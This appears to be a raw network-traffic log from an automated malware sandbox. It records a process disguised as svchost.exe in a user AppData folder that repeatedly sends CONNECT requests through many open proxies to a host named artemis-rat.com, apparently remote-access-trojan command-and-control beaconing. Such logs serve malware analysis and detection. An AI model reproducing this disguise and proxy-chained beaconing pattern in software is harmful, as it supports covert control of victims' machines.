                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2178192.168.2.556750187.40.1.12212843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.058304071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.833342075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.196368933 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2179192.168.2.55684516.163.88.2288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.058495998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.371884108 CET668INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 494
                                                                                    Connection: close
                                                                                    ETag: "5d52d17f-1ee"
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 65 72 72 6f 72 20 6c 6f 67 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe error log for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2180192.168.2.55684351.75.126.1503414443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.058780909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2181192.168.2.55684791.189.177.189312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.065874100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.386068106 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/5.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3628
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from lb1
                                                                                    X-Cache-Lookup: NONE from lb1:3128
                                                                                    Via: 1.1 lb1 (squid/5.7)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2182192.168.2.55681794.154.152.10807943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.065958977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.833349943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.834003925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.833872080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833707094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2183192.168.2.55670590.188.250.168043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.072467089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2184192.168.2.557010104.16.105.1468043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.075315952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.231844902 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2185192.168.2.55683245.11.95.166601043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.075781107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2186192.168.2.556833103.213.97.748043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.077749968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.408797979 CET334INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2187192.168.2.556816128.199.202.122808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.078583956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.447529078 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2188192.168.2.55695113.59.156.167312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.079866886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.296804905 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2189192.168.2.556609185.81.153.162338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.085099936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2190192.168.2.55686688.99.138.21696943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.086291075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2191192.168.2.556863110.12.211.1408043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.088648081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192192.168.2.556708124.160.118.183808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.091950893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.525211096 CET323INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.8.1
                                                                                    Date: Sun, 10 Mar 2024 00:35:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 172
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.8.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2193192.168.2.5568448.219.177.1341567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.093266010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2194192.168.2.556344117.160.250.1388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.101162910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.850224018 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2195192.168.2.556996157.185.157.1512658943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.104157925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2196192.168.2.556931147.75.92.251940143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.115442991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.391251087 CET356INHTTP/1.0 502 Bad Gateway
                                                                                    Server: Zscaler/6.3
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2197192.168.2.55588120.118.133.34312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.118267059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.146018982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.146545887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
